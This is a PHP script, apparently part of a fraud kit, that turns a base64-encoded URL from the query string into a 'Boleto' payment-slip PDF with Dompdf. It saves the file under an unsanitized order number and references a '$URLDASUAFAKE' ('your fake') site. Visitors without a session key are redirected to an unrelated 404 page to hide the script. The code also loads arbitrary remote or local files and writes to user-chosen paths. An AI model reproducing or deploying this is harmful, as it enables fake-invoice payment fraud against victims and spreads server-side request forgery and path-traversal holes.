<?php
use Dompdf\Dompdf;
if(isset($_GET['COMON/']) && ISSET($_GET["code"])){
	$p = $_GET['COMON/'];
	
	if(isset($_SESSION[$p]) && $_SESSION[$p] == $p){ 
	
	
	require_once './dompdf/autoload.inc.php';

//Criando a instancia do Dom PDF.
//Criando o namespace para evitar erros


// Instanciando a classe do Dom DPF
$dompdf = new Dompdf();


$options = $dompdf->getOptions();
//$options->setDefaultFont('Courier');
$dompdf->setOptions($options);
$options->setIsHtml5ParserEnabled(true);
$options-> setIsRemoteEnabled (true);
$options-> setTempDir('tempo/');
//Criando o código HTML que será transformado em pdf
$urlpega = base64_decode($_GET['code']);
$pedidopega = $_GET['num'];
$file= $urlpega;
$dompdf->load_html_file($file);

//Define o tipo de papel de impressão (opcional)
//tamanho (A4, A3, A2, etc)
//oritenação do papel:'portrait' (em pé) ou 'landscape' (deitado)
$dompdf->setPaper('A4', 'portrait');

// Vai renderizar o HTML como PDF
$dompdf->render();

// Saída do pdf para a renderização do navegador.
//Coloca o nome que deseja que seja renderizado.

$pnumero = "02-895563336";
$dompdf->stream("Boleto-$pedidopega.pdf", array(true)); 
$output = $dompdf->output();
    file_put_contents("boletos/$pedidopega.pdf", $output);
	
$urli = $URLDASUAFAKE.'/?COMON/=SEND&code=$pedidopega';
//Header("Location: $urli" );



 }else{
	
		Header( "Location: https://www.techtudo.com.br/listas/2018/07/o-que-e-erro-404-veja-significado-dos-problemas-mais-comuns.ghtml" );
}


}else{
	
		Header( "Location: https://www.techtudo.com.br/listas/2018/07/o-que-e-erro-404-veja-significado-dos-problemas-mais-comuns.ghtml" );
	
} ?>